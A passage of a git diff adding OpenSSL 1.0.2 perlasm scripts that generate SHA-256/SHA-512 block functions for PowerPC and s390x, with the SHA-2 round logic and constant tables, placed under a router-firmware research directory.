+	$PUSH	$inp,`$FRAME-$SIZE_T*26`($sp)	; save real inp
+	addi	$t1,$sp,`$LOCALS+16*$SZ`	; fictitious end pointer
+	addi	$inp,$sp,$LOCALS		; fictitious inp pointer
+	$PUSH	$num,`$FRAME-$SIZE_T*25`($sp)	; save real num
+	$PUSH	$t1,`$FRAME-$SIZE_T*24`($sp)	; end pointer
+	$PUSH	$inp,`$FRAME-$SIZE_T*23`($sp)	; inp pointer
+	bl	Lsha2_block_private
+	$POP	$inp,`$FRAME-$SIZE_T*26`($sp)	; restore real inp
+	$POP	$num,`$FRAME-$SIZE_T*25`($sp)	; restore real num
+	addic.	$num,$num,`-16*$SZ`		; num--
+	bne-	Lunaligned
+
+Ldone:
+	$POP	r0,`$FRAME+$LRSAVE`($sp)
+	$POP	r14,`$FRAME-$SIZE_T*18`($sp)
+	$POP	r15,`$FRAME-$SIZE_T*17`($sp)
+	$POP	r16,`$FRAME-$SIZE_T*16`($sp)
+	$POP	r17,`$FRAME-$SIZE_T*15`($sp)
+	$POP	r18,`$FRAME-$SIZE_T*14`($sp)
+	$POP	r19,`$FRAME-$SIZE_T*13`($sp)
+	$POP	r20,`$FRAME-$SIZE_T*12`($sp)
+	$POP	r21,`$FRAME-$SIZE_T*11`($sp)
+	$POP	r22,`$FRAME-$SIZE_T*10`($sp)
+	$POP	r23,`$FRAME-$SIZE_T*9`($sp)
+	$POP	r24,`$FRAME-$SIZE_T*8`($sp)
+	$POP	r25,`$FRAME-$SIZE_T*7`($sp)
+	$POP	r26,`$FRAME-$SIZE_T*6`($sp)
+	$POP	r27,`$FRAME-$SIZE_T*5`($sp)
+	$POP	r28,`$FRAME-$SIZE_T*4`($sp)
+	$POP	r29,`$FRAME-$SIZE_T*3`($sp)
+	$POP	r30,`$FRAME-$SIZE_T*2`($sp)
+	$POP	r31,`$FRAME-$SIZE_T*1`($sp)
+	mtlr	r0
+	addi	$sp,$sp,$FRAME
+	blr
+	.long	0
+	.byte	0,12,4,1,0x80,18,3,0
+	.long	0
+___
+
+if ($SZ==4 || $SIZE_T==8) {
+$code.=<<___;
+.align	4
+Lsha2_block_private:
+	$LD	$t1,0($Tbl)
+___
+for($i=0;$i<16;$i++) {
+$code.=<<___ if ($SZ==4 && !$LITTLE_ENDIAN);
+	lwz	@X[$i],`$i*$SZ`($inp)
+___
+$code.=<<___ if ($SZ==4 && $LITTLE_ENDIAN);
+	lwz	$a0,`$i*$SZ`($inp)
+	rotlwi	@X[$i],$a0,8
+	rlwimi	@X[$i],$a0,24,0,7
+	rlwimi	@X[$i],$a0,24,16,23
+___
+# 64-bit loads are split to 2x32-bit ones, as CPU can't handle
+# unaligned 64-bit loads, only 32-bit ones...
+$code.=<<___ if ($SZ==8 && !$LITTLE_ENDIAN);
+	lwz	$t0,`$i*$SZ`($inp)
+	lwz	@X[$i],`$i*$SZ+4`($inp)
+	insrdi	@X[$i],$t0,32,0
+___
+$code.=<<___ if ($SZ==8 && $LITTLE_ENDIAN);
+	lwz	$a0,`$i*$SZ`($inp)
+	 lwz	$a1,`$i*$SZ+4`($inp)
+	rotlwi	$t0,$a0,8
+	 rotlwi	@X[$i],$a1,8
+	rlwimi	$t0,$a0,24,0,7
+	 rlwimi	@X[$i],$a1,24,0,7
+	rlwimi	$t0,$a0,24,16,23
+	 rlwimi	@X[$i],$a1,24,16,23
+	insrdi	@X[$i],$t0,32,0
+___
+	&ROUND_00_15($i,@V);
+	unshift(@V,pop(@V));
+}
+$code.=<<___;
+	li	$t0,`$rounds/16-1`
+	mtctr	$t0
+.align	4
+Lrounds:
+	addi	$Tbl,$Tbl,`16*$SZ`
+___
+for(;$i<32;$i++) {
+	&ROUND_16_xx($i,@V);
+	unshift(@V,pop(@V));
+}
+$code.=<<___;
+	bdnz-	Lrounds
+
+	$POP	$ctx,`$FRAME-$SIZE_T*22`($sp)
+	$POP	$inp,`$FRAME-$SIZE_T*23`($sp)	; inp pointer
+	$POP	$num,`$FRAME-$SIZE_T*24`($sp)	; end pointer
+	subi	$Tbl,$Tbl,`($rounds-16)*$SZ`	; rewind Tbl
+
+	$LD	r16,`0*$SZ`($ctx)
+	$LD	r17,`1*$SZ`($ctx)
+	$LD	r18,`2*$SZ`($ctx)
+	$LD	r19,`3*$SZ`($ctx)
+	$LD	r20,`4*$SZ`($ctx)
+	$LD	r21,`5*$SZ`($ctx)
+	$LD	r22,`6*$SZ`($ctx)
+	addi	$inp,$inp,`16*$SZ`		; advance inp
+	$LD	r23,`7*$SZ`($ctx)
+	add	$A,$A,r16
+	add	$B,$B,r17
+	$PUSH	$inp,`$FRAME-$SIZE_T*23`($sp)
+	add	$C,$C,r18
+	$ST	$A,`0*$SZ`($ctx)
+	add	$D,$D,r19
+	$ST	$B,`1*$SZ`($ctx)
+	add	$E,$E,r20
+	$ST	$C,`2*$SZ`($ctx)
+	add	$F,$F,r21
+	$ST	$D,`3*$SZ`($ctx)
+	add	$G,$G,r22
+	$ST	$E,`4*$SZ`($ctx)
+	add	$H,$H,r23
+	$ST	$F,`5*$SZ`($ctx)
+	$ST	$G,`6*$SZ`($ctx)
+	$UCMP	$inp,$num
+	$ST	$H,`7*$SZ`($ctx)
+	bne	Lsha2_block_private
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	$func,.-$func
+___
+} else {
+########################################################################
+# SHA512 for PPC32, X vector is off-loaded to stack...
+#
+#			|	sha512
+#			|	-m32
+# ----------------------+-----------------------
+# PPC74x0,gcc-4.0.1	|	+48%
+# POWER6,gcc-4.4.6	|	+124%(*)
+# POWER7,gcc-4.4.6	|	+79%(*)
+# e300,gcc-4.1.0	|	+167%
+#
+# (*)	~1/3 of -m64 result [and ~20% better than -m32 code generated
+#	by xlc-12.1]
+
+my $XOFF=$LOCALS;
+
+my @V=map("r$_",(16..31));	# A..H
+
+my ($s0,$s1,$t0,$t1,$t2,$t3,$a0,$a1,$a2,$a3)=map("r$_",(0,5,6,8..12,14,15));
+my ($x0,$x1)=("r3","r4");	# zaps $ctx and $inp
+
+sub ROUND_00_15_ppc32 {
+my ($i,	$ahi,$alo,$bhi,$blo,$chi,$clo,$dhi,$dlo,
+	$ehi,$elo,$fhi,$flo,$ghi,$glo,$hhi,$hlo)=@_;
+
+$code.=<<___;
+	lwz	$t2,`$SZ*($i%16)+($LITTLE_ENDIAN^4)`($Tbl)
+	 xor	$a0,$flo,$glo
+	lwz	$t3,`$SZ*($i%16)+($LITTLE_ENDIAN^0)`($Tbl)
+	 xor	$a1,$fhi,$ghi
+	addc	$hlo,$hlo,$t0			; h+=x[i]
+	stw	$t0,`$XOFF+0+$SZ*($i%16)`($sp)	; save x[i]
+
+	srwi	$s0,$elo,$Sigma1[0]
+	srwi	$s1,$ehi,$Sigma1[0]
+	 and	$a0,$a0,$elo
+	adde	$hhi,$hhi,$t1
+	 and	$a1,$a1,$ehi
+	stw	$t1,`$XOFF+4+$SZ*($i%16)`($sp)
+	srwi	$t0,$elo,$Sigma1[1]
+	srwi	$t1,$ehi,$Sigma1[1]
+	 addc	$hlo,$hlo,$t2			; h+=K512[i]
+	insrwi	$s0,$ehi,$Sigma1[0],0
+	insrwi	$s1,$elo,$Sigma1[0],0
+	 xor	$a0,$a0,$glo			; Ch(e,f,g)
+	 adde	$hhi,$hhi,$t3
+	 xor	$a1,$a1,$ghi
+	insrwi	$t0,$ehi,$Sigma1[1],0
+	insrwi	$t1,$elo,$Sigma1[1],0
+	 addc	$hlo,$hlo,$a0			; h+=Ch(e,f,g)
+	srwi	$t2,$ehi,$Sigma1[2]-32
+	srwi	$t3,$elo,$Sigma1[2]-32
+	xor	$s0,$s0,$t0
+	xor	$s1,$s1,$t1
+	insrwi	$t2,$elo,$Sigma1[2]-32,0
+	insrwi	$t3,$ehi,$Sigma1[2]-32,0
+	 xor	$a0,$alo,$blo			; a^b, b^c in next round
+	 adde	$hhi,$hhi,$a1
+	 xor	$a1,$ahi,$bhi
+	xor	$s0,$s0,$t2			; Sigma1(e)
+	xor	$s1,$s1,$t3
+
+	srwi	$t0,$alo,$Sigma0[0]
+	 and	$a2,$a2,$a0
+	 addc	$hlo,$hlo,$s0			; h+=Sigma1(e)
+	 and	$a3,$a3,$a1
+	srwi	$t1,$ahi,$Sigma0[0]
+	srwi	$s0,$ahi,$Sigma0[1]-32
+	 adde	$hhi,$hhi,$s1
+	srwi	$s1,$alo,$Sigma0[1]-32
+	insrwi	$t0,$ahi,$Sigma0[0],0
+	insrwi	$t1,$alo,$Sigma0[0],0
+	 xor	$a2,$a2,$blo			; Maj(a,b,c)
+	 addc	$dlo,$dlo,$hlo			; d+=h
+	 xor	$a3,$a3,$bhi
+	insrwi	$s0,$alo,$Sigma0[1]-32,0
+	insrwi	$s1,$ahi,$Sigma0[1]-32,0
+	 adde	$dhi,$dhi,$hhi
+	srwi	$t2,$ahi,$Sigma0[2]-32
+	srwi	$t3,$alo,$Sigma0[2]-32
+	xor	$s0,$s0,$t0
+	 addc	$hlo,$hlo,$a2			; h+=Maj(a,b,c)
+	xor	$s1,$s1,$t1
+	insrwi	$t2,$alo,$Sigma0[2]-32,0
+	insrwi	$t3,$ahi,$Sigma0[2]-32,0
+	 adde	$hhi,$hhi,$a3
+___
+$code.=<<___ if ($i>=15);
+	lwz	$t0,`$XOFF+0+$SZ*(($i+2)%16)`($sp)
+	lwz	$t1,`$XOFF+4+$SZ*(($i+2)%16)`($sp)
+___
+$code.=<<___ if ($i<15 && !$LITTLE_ENDIAN);
+	lwz	$t1,`$SZ*($i+1)+0`($inp)
+	lwz	$t0,`$SZ*($i+1)+4`($inp)
+___
+$code.=<<___ if ($i<15 && $LITTLE_ENDIAN);
+	lwz	$a2,`$SZ*($i+1)+0`($inp)
+	 lwz	$a3,`$SZ*($i+1)+4`($inp)
+	rotlwi	$t1,$a2,8
+	 rotlwi	$t0,$a3,8
+	rlwimi	$t1,$a2,24,0,7
+	 rlwimi	$t0,$a3,24,0,7
+	rlwimi	$t1,$a2,24,16,23
+	 rlwimi	$t0,$a3,24,16,23
+___
+$code.=<<___;
+	xor	$s0,$s0,$t2			; Sigma0(a)
+	xor	$s1,$s1,$t3
+	addc	$hlo,$hlo,$s0			; h+=Sigma0(a)
+	adde	$hhi,$hhi,$s1
+___
+$code.=<<___ if ($i==15);
+	lwz	$x0,`$XOFF+0+$SZ*(($i+1)%16)`($sp)
+	lwz	$x1,`$XOFF+4+$SZ*(($i+1)%16)`($sp)
+___
+}
+sub ROUND_16_xx_ppc32 {
+my ($i,	$ahi,$alo,$bhi,$blo,$chi,$clo,$dhi,$dlo,
+	$ehi,$elo,$fhi,$flo,$ghi,$glo,$hhi,$hlo)=@_;
+
+$code.=<<___;
+	srwi	$s0,$t0,$sigma0[0]
+	srwi	$s1,$t1,$sigma0[0]
+	srwi	$t2,$t0,$sigma0[1]
+	srwi	$t3,$t1,$sigma0[1]
+	insrwi	$s0,$t1,$sigma0[0],0
+	insrwi	$s1,$t0,$sigma0[0],0
+	srwi	$a0,$t0,$sigma0[2]
+	insrwi	$t2,$t1,$sigma0[1],0
+	insrwi	$t3,$t0,$sigma0[1],0
+	insrwi	$a0,$t1,$sigma0[2],0
+	xor	$s0,$s0,$t2
+	 lwz	$t2,`$XOFF+0+$SZ*(($i+14)%16)`($sp)
+	srwi	$a1,$t1,$sigma0[2]
+	xor	$s1,$s1,$t3
+	 lwz	$t3,`$XOFF+4+$SZ*(($i+14)%16)`($sp)
+	xor	$a0,$a0,$s0
+	 srwi	$s0,$t2,$sigma1[0]
+	xor	$a1,$a1,$s1
+	 srwi	$s1,$t3,$sigma1[0]
+	addc	$x0,$x0,$a0			; x[i]+=sigma0(x[i+1])
+	 srwi	$a0,$t3,$sigma1[1]-32
+	insrwi	$s0,$t3,$sigma1[0],0
+	insrwi	$s1,$t2,$sigma1[0],0
+	adde	$x1,$x1,$a1
+	 srwi	$a1,$t2,$sigma1[1]-32
+
+	insrwi	$a0,$t2,$sigma1[1]-32,0
+	srwi	$t2,$t2,$sigma1[2]
+	insrwi	$a1,$t3,$sigma1[1]-32,0
+	insrwi	$t2,$t3,$sigma1[2],0
+	xor	$s0,$s0,$a0
+	 lwz	$a0,`$XOFF+0+$SZ*(($i+9)%16)`($sp)
+	srwi	$t3,$t3,$sigma1[2]
+	xor	$s1,$s1,$a1
+	 lwz	$a1,`$XOFF+4+$SZ*(($i+9)%16)`($sp)
+	xor	$s0,$s0,$t2
+	 addc	$x0,$x0,$a0			; x[i]+=x[i+9]
+	xor	$s1,$s1,$t3
+	 adde	$x1,$x1,$a1
+	addc	$x0,$x0,$s0			; x[i]+=sigma1(x[i+14])
+	adde	$x1,$x1,$s1
+___
+	($t0,$t1,$x0,$x1) = ($x0,$x1,$t0,$t1);
+	&ROUND_00_15_ppc32(@_);
+}
+
+$code.=<<___;
+.align	4
+Lsha2_block_private:
+___
+$code.=<<___ if (!$LITTLE_ENDIAN);
+	lwz	$t1,0($inp)
+	xor	$a2,@V[3],@V[5]		; B^C, magic seed
+	lwz	$t0,4($inp)
+	xor	$a3,@V[2],@V[4]
+___
+$code.=<<___ if ($LITTLE_ENDIAN);
+	lwz	$a1,0($inp)
+	xor	$a2,@V[3],@V[5]		; B^C, magic seed
+	lwz	$a0,4($inp)
+	xor	$a3,@V[2],@V[4]
+	rotlwi	$t1,$a1,8
+	 rotlwi	$t0,$a0,8
+	rlwimi	$t1,$a1,24,0,7
+	 rlwimi	$t0,$a0,24,0,7
+	rlwimi	$t1,$a1,24,16,23
+	 rlwimi	$t0,$a0,24,16,23
+___
+for($i=0;$i<16;$i++) {
+	&ROUND_00_15_ppc32($i,@V);
+	unshift(@V,pop(@V));	unshift(@V,pop(@V));
+	($a0,$a1,$a2,$a3) = ($a2,$a3,$a0,$a1);
+}
+$code.=<<___;
+	li	$a0,`$rounds/16-1`
+	mtctr	$a0
+.align	4
+Lrounds:
+	addi	$Tbl,$Tbl,`16*$SZ`
+___
+for(;$i<32;$i++) {
+	&ROUND_16_xx_ppc32($i,@V);
+	unshift(@V,pop(@V));	unshift(@V,pop(@V));
+	($a0,$a1,$a2,$a3) = ($a2,$a3,$a0,$a1);
+}
+$code.=<<___;
+	bdnz-	Lrounds
+
+	$POP	$ctx,`$FRAME-$SIZE_T*22`($sp)
+	$POP	$inp,`$FRAME-$SIZE_T*23`($sp)	; inp pointer
+	$POP	$num,`$FRAME-$SIZE_T*24`($sp)	; end pointer
+	subi	$Tbl,$Tbl,`($rounds-16)*$SZ`	; rewind Tbl
+
+	lwz	$t0,`$LITTLE_ENDIAN^0`($ctx)
+	lwz	$t1,`$LITTLE_ENDIAN^4`($ctx)
+	lwz	$t2,`$LITTLE_ENDIAN^8`($ctx)
+	lwz	$t3,`$LITTLE_ENDIAN^12`($ctx)
+	lwz	$a0,`$LITTLE_ENDIAN^16`($ctx)
+	lwz	$a1,`$LITTLE_ENDIAN^20`($ctx)
+	lwz	$a2,`$LITTLE_ENDIAN^24`($ctx)
+	addc	@V[1],@V[1],$t1
+	lwz	$a3,`$LITTLE_ENDIAN^28`($ctx)
+	adde	@V[0],@V[0],$t0
+	lwz	$t0,`$LITTLE_ENDIAN^32`($ctx)
+	addc	@V[3],@V[3],$t3
+	lwz	$t1,`$LITTLE_ENDIAN^36`($ctx)
+	adde	@V[2],@V[2],$t2
+	lwz	$t2,`$LITTLE_ENDIAN^40`($ctx)
+	addc	@V[5],@V[5],$a1
+	lwz	$t3,`$LITTLE_ENDIAN^44`($ctx)
+	adde	@V[4],@V[4],$a0
+	lwz	$a0,`$LITTLE_ENDIAN^48`($ctx)
+	addc	@V[7],@V[7],$a3
+	lwz	$a1,`$LITTLE_ENDIAN^52`($ctx)
+	adde	@V[6],@V[6],$a2
+	lwz	$a2,`$LITTLE_ENDIAN^56`($ctx)
+	addc	@V[9],@V[9],$t1
+	lwz	$a3,`$LITTLE_ENDIAN^60`($ctx)
+	adde	@V[8],@V[8],$t0
+	stw	@V[0],`$LITTLE_ENDIAN^0`($ctx)
+	stw	@V[1],`$LITTLE_ENDIAN^4`($ctx)
+	addc	@V[11],@V[11],$t3
+	stw	@V[2],`$LITTLE_ENDIAN^8`($ctx)
+	stw	@V[3],`$LITTLE_ENDIAN^12`($ctx)
+	adde	@V[10],@V[10],$t2
+	stw	@V[4],`$LITTLE_ENDIAN^16`($ctx)
+	stw	@V[5],`$LITTLE_ENDIAN^20`($ctx)
+	addc	@V[13],@V[13],$a1
+	stw	@V[6],`$LITTLE_ENDIAN^24`($ctx)
+	stw	@V[7],`$LITTLE_ENDIAN^28`($ctx)
+	adde	@V[12],@V[12],$a0
+	stw	@V[8],`$LITTLE_ENDIAN^32`($ctx)
+	stw	@V[9],`$LITTLE_ENDIAN^36`($ctx)
+	addc	@V[15],@V[15],$a3
+	stw	@V[10],`$LITTLE_ENDIAN^40`($ctx)
+	stw	@V[11],`$LITTLE_ENDIAN^44`($ctx)
+	adde	@V[14],@V[14],$a2
+	stw	@V[12],`$LITTLE_ENDIAN^48`($ctx)
+	stw	@V[13],`$LITTLE_ENDIAN^52`($ctx)
+	stw	@V[14],`$LITTLE_ENDIAN^56`($ctx)
+	stw	@V[15],`$LITTLE_ENDIAN^60`($ctx)
+
+	addi	$inp,$inp,`16*$SZ`		; advance inp
+	$PUSH	$inp,`$FRAME-$SIZE_T*23`($sp)
+	$UCMP	$inp,$num
+	bne	Lsha2_block_private
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+.size	$func,.-$func
+___
+}
+
+# Ugly hack here, because PPC assembler syntax seem to vary too
+# much from platforms to platform...
+$code.=<<___;
+.align	6
+LPICmeup:
+	mflr	r0
+	bcl	20,31,\$+4
+	mflr	$Tbl	; vvvvvv "distance" between . and 1st data entry
+	addi	$Tbl,$Tbl,`64-8`
+	mtlr	r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,0,0
+	.space	`64-9*4`
+___
+$code.=<<___ if ($SZ==8);
+	.quad	0x428a2f98d728ae22,0x7137449123ef65cd
+	.quad	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	.quad	0x3956c25bf348b538,0x59f111f1b605d019
+	.quad	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	.quad	0xd807aa98a3030242,0x12835b0145706fbe
+	.quad	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
+	.quad	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	.quad	0x9bdc06a725c71235,0xc19bf174cf692694
+	.quad	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	.quad	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	.quad	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	.quad	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	.quad	0x983e5152ee66dfab,0xa831c66d2db43210
+	.quad	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	.quad	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	.quad	0x06ca6351e003826f,0x142929670a0e6e70
+	.quad	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	.quad	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	.quad	0x650a73548baf63de,0x766a0abb3c77b2a8
+	.quad	0x81c2c92e47edaee6,0x92722c851482353b
+	.quad	0xa2bfe8a14cf10364,0xa81a664bbc423001
+	.quad	0xc24b8b70d0f89791,0xc76c51a30654be30
+	.quad	0xd192e819d6ef5218,0xd69906245565a910
+	.quad	0xf40e35855771202a,0x106aa07032bbd1b8
+	.quad	0x19a4c116b8d2d0c8,0x1e376c085141ab53
+	.quad	0x2748774cdf8eeb99,0x34b0bcb5e19b48a8
+	.quad	0x391c0cb3c5c95a63,0x4ed8aa4ae3418acb
+	.quad	0x5b9cca4f7763e373,0x682e6ff3d6b2b8a3
+	.quad	0x748f82ee5defb2fc,0x78a5636f43172f60
+	.quad	0x84c87814a1f0ab72,0x8cc702081a6439ec
+	.quad	0x90befffa23631e28,0xa4506cebde82bde9
+	.quad	0xbef9a3f7b2c67915,0xc67178f2e372532b
+	.quad	0xca273eceea26619c,0xd186b8c721c0c207
+	.quad	0xeada7dd6cde0eb1e,0xf57d4f7fee6ed178
+	.quad	0x06f067aa72176fba,0x0a637dc5a2c898a6
+	.quad	0x113f9804bef90dae,0x1b710b35131c471b
+	.quad	0x28db77f523047d84,0x32caab7b40c72493
+	.quad	0x3c9ebe0a15c9bebc,0x431d67c49c100d4c
+	.quad	0x4cc5d4becb3e42b6,0x597f299cfc657e2a
+	.quad	0x5fcb6fab3ad6faec,0x6c44198c4a475817
+___
+$code.=<<___ if ($SZ==4);
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-s390x.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-s390x.pl
new file mode 100644
index 0000000..079a3fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-s390x.pl
@@ -0,0 +1,322 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA256/512 block procedures for s390x.
+
+# April 2007.
+#
+# sha256_block_data_order is reportedly >3 times faster than gcc 3.3
+# generated code (must be a bug in compiler, as improvement is
+# "pathologically" high, in particular in comparison to other SHA
+# modules). But the real twist is that it detects if hardware support
+# for SHA256 is available and in such case utilizes it. Then the
+# performance can reach >6.5x of assembler one for larger chunks.
+#
+# sha512_block_data_order is ~70% faster than gcc 3.3 generated code.
+
+# January 2009.
+#
+# Add support for hardware SHA512 and reschedule instructions to
+# favour dual-issue z10 pipeline. Hardware SHA256/512 is ~4.7x faster
+# than software.
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific. On z900 SHA256 was measured to
+# perform 2.4x and SHA512 - 13x better than code generated by gcc 4.3.
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+$t0="%r0";
+$t1="%r1";
+$ctx="%r2";	$t2="%r2";
+$inp="%r3";
+$len="%r4";	# used as index in inner loop
+
+$A="%r5";
+$B="%r6";
+$C="%r7";
+$D="%r8";
+$E="%r9";
+$F="%r10";
+$G="%r11";
+$H="%r12";	@V=($A,$B,$C,$D,$E,$F,$G,$H);
+$tbl="%r13";
+$T1="%r14";
+$sp="%r15";
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+if ($output =~ /512/) {
+	$label="512";
+	$SZ=8;
+	$LD="lg";	# load from memory
+	$ST="stg";	# store to memory
+	$ADD="alg";	# add with memory operand
+	$ROT="rllg";	# rotate left
+	$SHR="srlg";	# logical right shift [see even at the end]
+	@Sigma0=(25,30,36);
+	@Sigma1=(23,46,50);
+	@sigma0=(56,63, 7);
+	@sigma1=( 3,45, 6);
+	$rounds=80;
+	$kimdfunc=3;	# 0 means unknown/unsupported/unimplemented/disabled
+} else {
+	$label="256";
+	$SZ=4;
+	$LD="llgf";	# load from memory
+	$ST="st";	# store to memory
+	$ADD="al";	# add with memory operand
+	$ROT="rll";	# rotate left
+	$SHR="srl";	# logical right shift
+	@Sigma0=(10,19,30);
+	@Sigma1=( 7,21,26);
+	@sigma0=(14,25, 3);
+	@sigma1=(13,15,10);
+	$rounds=64;
+	$kimdfunc=2;	# magic function code for kimd instruction
+}
+$Func="sha${label}_block_data_order";
+$Table="K${label}";
+$stdframe=16*$SIZE_T+4*8;
+$frame=$stdframe+16*$SZ;
+
+sub BODY_00_15 {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+
+$code.=<<___ if ($i<16);
+	$LD	$T1,`$i*$SZ`($inp)	### $i
+___
+$code.=<<___;
+	$ROT	$t0,$e,$Sigma1[0]
+	$ROT	$t1,$e,$Sigma1[1]
+	 lgr	$t2,$f
+	xgr	$t0,$t1
+	$ROT	$t1,$t1,`$Sigma1[2]-$Sigma1[1]`
+	 xgr	$t2,$g
+	$ST	$T1,`$stdframe+$SZ*($i%16)`($sp)
+	xgr	$t0,$t1			# Sigma1(e)
+	algr	$T1,$h			# T1+=h
+	 ngr	$t2,$e
+	 lgr	$t1,$a
+	algr	$T1,$t0			# T1+=Sigma1(e)
+	$ROT	$h,$a,$Sigma0[0]
+	 xgr	$t2,$g			# Ch(e,f,g)
+	$ADD	$T1,`$i*$SZ`($len,$tbl)	# T1+=K[i]
+	$ROT	$t0,$a,$Sigma0[1]
+	algr	$T1,$t2			# T1+=Ch(e,f,g)
+	 ogr	$t1,$b
+	xgr	$h,$t0
+	 lgr	$t2,$a
+	 ngr	$t1,$c
+	$ROT	$t0,$t0,`$Sigma0[2]-$Sigma0[1]`
+	xgr	$h,$t0			# h=Sigma0(a)
+	 ngr	$t2,$b
+	algr	$h,$T1			# h+=T1
+	 ogr	$t2,$t1			# Maj(a,b,c)
+	algr	$d,$T1			# d+=T1
+	algr	$h,$t2			# h+=Maj(a,b,c)
+___
+}
+
+sub BODY_16_XX {
+my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+
+$code.=<<___;
+	$LD	$T1,`$stdframe+$SZ*(($i+1)%16)`($sp)	### $i
+	$LD	$t1,`$stdframe+$SZ*(($i+14)%16)`($sp)
+	$ROT	$t0,$T1,$sigma0[0]
+	$SHR	$T1,$sigma0[2]
+	$ROT	$t2,$t0,`$sigma0[1]-$sigma0[0]`
+	xgr	$T1,$t0
+	$ROT	$t0,$t1,$sigma1[0]
+	xgr	$T1,$t2					# sigma0(X[i+1])
+	$SHR	$t1,$sigma1[2]
+	$ADD	$T1,`$stdframe+$SZ*($i%16)`($sp)	# +=X[i]
+	xgr	$t1,$t0
+	$ROT	$t0,$t0,`$sigma1[1]-$sigma1[0]`
+	$ADD	$T1,`$stdframe+$SZ*(($i+9)%16)`($sp)	# +=X[i+9]
+	xgr	$t1,$t0				# sigma1(X[i+14])
+	algr	$T1,$t1				# +=sigma1(X[i+14])
+___
+	&BODY_00_15(@_);
+}
+
+$code.=<<___;
+.text
+.align	64
+.type	$Table,\@object
+$Table:
+___
+$code.=<<___ if ($SZ==4);
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+___
+$code.=<<___ if ($SZ==8);
+	.quad	0x428a2f98d728ae22,0x7137449123ef65cd
+	.quad	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	.quad	0x3956c25bf348b538,0x59f111f1b605d019
+	.quad	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	.quad	0xd807aa98a3030242,0x12835b0145706fbe
+	.quad	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
